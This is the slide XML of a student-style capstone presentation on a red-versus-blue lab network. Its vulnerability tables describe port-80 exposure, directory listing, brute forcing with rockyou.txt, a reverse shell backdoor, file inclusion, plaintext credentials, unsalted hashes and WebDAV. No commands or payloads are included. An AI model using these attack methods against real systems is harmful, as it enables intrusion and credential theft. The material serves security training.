              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Gateway: 10.0.0.1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192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: Windows</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Hostname: Red vs Blue (ML-REFVM-684427)</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192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: Kali GNU</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192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: Ubuntu</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192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: Ubuntu</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Hostname: ELK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5FACFF50-23D2-EFBD-F63D-781FAC55687B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="601592" y="690768"/>
            <a:ext cx="5868783" cy="43392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dirty="0">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Nmap identified the following hosts on the network:</a:t>
            </a:r>
            <a:endParaRPr dirty="0">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3405538464"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="8346600" cy="3818915"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{2440C459-057F-4FCB-AB8C-C222AC24DD2E}</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Hyper-V Azure Machine (ML-REFVM-684427)</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Host Machine Cloud based – hosting the 3 virtual machines below</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Kali</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192.168.1.90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Attacking Machine used for penetration testing</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ELK</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Network monitoring machine running Kibana – logs data from Capstone machine (target machine – 192.168.1.105)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Capstone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Target machine replicating a vulnerable server – attempting to pop-hosting an Apache and SSH server </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3916178393"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="8362500" cy="3588142"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{2440C459-057F-4FCB-AB8C-C222AC24DD2E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2792885">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2782115">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pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Open Web Port (80) with public access – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>CVE-2019-6579</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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r>
                        <a:rPr lang="en-US" sz="1000" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Port 80 is commonly used for web communication and if left open and unsecure, it can allow public access.</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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r>
                        <a:rPr lang="en-US" sz="1000" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>This vulnerability allows access into the web servers. Files and folders are readily accessible. Sensitive and secret files and folders can be found. The attackers could execute system commands with administrative privileges. </a:t>
                      </a:r>
                      <a:endParaRPr sz="10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533617">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Apache Directory Listing – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CVE-2007-0450</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r>
                        <a:rPr lang="en" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Allowed attackers to reveal the IP address and the secret folder. </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r>
                        <a:rPr lang="en" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Allowed attackers to reveal the IP address and the secret folder. </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pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Brute-force Attack</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r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>An attack that consists of systematically checking all possible username and password combinations until the correct one is found.</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r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>With the use of brute force and a common passwords list (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>rockyou.txt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>), the password can be easily found. </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l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Reverse Shell Backdoor – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>CVE-2019-13386</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r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Allows to send a reverse shell payload on a web server while the firewalls do not detect the payload.</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r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attackers gained the remote backdoor access to the Capstone web server.</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Vulnerability Assessment – (Continued)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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1654174479"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467149" y="1201900"/>
          <a:ext cx="8390604" cy="3991821"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{2440C459-057F-4FCB-AB8C-C222AC24DD2E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2802271">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2791465">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2796868">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="39418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239368">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Local File Inclusion (LFI) or Remote File Inclusion (RFI) – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>CVE-2021-31783</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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r>
                        <a:rPr lang="en-US" sz="1000" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Local File Inclusion (LFI) or Remote File Inclusion (RFI) are vulnerabilities that are often found in poorly-written web applications. These vulnerabilities occur when a web application allows the user to submit input into files or upload files to the server.  </a:t>
                      </a:r>
                      <a:endParaRPr sz="10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r>
                        <a:rPr lang="en-US" sz="1000" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>An LFI or RFI vulnerability allows an attacker to upload a malicious payload.</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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624416">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Directory Indexing Vulnerability </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CWE-548</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>CVE-2019-5437</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>)</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r>
                        <a:rPr lang="en" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attackers can view and download content of a directory located on a vulnerable device. </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r>
                        <a:rPr lang="en" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Allowed attackers to gain access to source code, or devise other exploits. The directory listing can compromise private or confidential data. </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1061">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The other user’s credentials were discovered when logging on with different user – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>CVE-2020-24227</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r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Storing the non-encrypted username and/or password in plain text. </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r>
                        <a:rPr lang="en-AU" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Evidence showed that Ashton had Ryan’s username and password hash stored. This enabled further penetration into the system without extensive social engineering.</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1061">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Weak Hashed Password</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r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Unsalted hashed passwords can be easily cracked with resources – John the ripper or </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>crackstation.net</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r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attackers only need username and password to compromise the account, gaining access. </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337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Vulnerability Assessment – (Continued)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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2700582392"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467149" y="1201900"/>
          <a:ext cx="8390604" cy="3232387"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{2440C459-057F-4FCB-AB8C-C222AC24DD2E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2802271">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2791465">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2796868">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="39418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489107">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>WebDAV Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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r>
                        <a:rPr lang="en-US" sz="1000" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Exploit WebDAV on a server and shell access is possible.</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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r>
                        <a:rPr lang="en-US" sz="1000" i="0" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>It will allowed attackers or hackers to remotely modified the website content if WebDAV did not configure properly. </a:t>
                      </a:r>
                      <a:endParaRPr sz="10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674005">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Simple Usernames</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r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Any combination of your first name, last name or short names or any simple combination</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r>
                        <a:rPr lang="en" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The names such as Ashton, Ryan, and Hannah are all simple usernames that can be easily </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000" dirty="0" err="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>obta</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1000" dirty="0" err="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ned.</a:t>
                      </a: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1061">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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1061">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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just" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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just" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="10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32481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8780</TotalTime>
  <Words>2777</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>284</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Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System  Prepared by Joshua Ling</vt:lpstr>
      <vt:lpstr>Table of Contents </vt:lpstr>
      <vt:lpstr>Network Topology </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Security Assessment </vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment – (Continued)</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment – (Continued)</vt:lpstr>
      <vt:lpstr>Exploitation: Open Web Port (80) CVE-2019-6579</vt:lpstr>
      <vt:lpstr>Exploitation: Open Web Port (80) CVE-2019-6579 - (Continued)</vt:lpstr>
      <vt:lpstr>Exploitation: Brute-force Attack</vt:lpstr>
      <vt:lpstr>Exploitation: Brute-force Attack</vt:lpstr>
      <vt:lpstr>Exploitation: Reverse Shell Backdoor CVE-2019-13386</vt:lpstr>
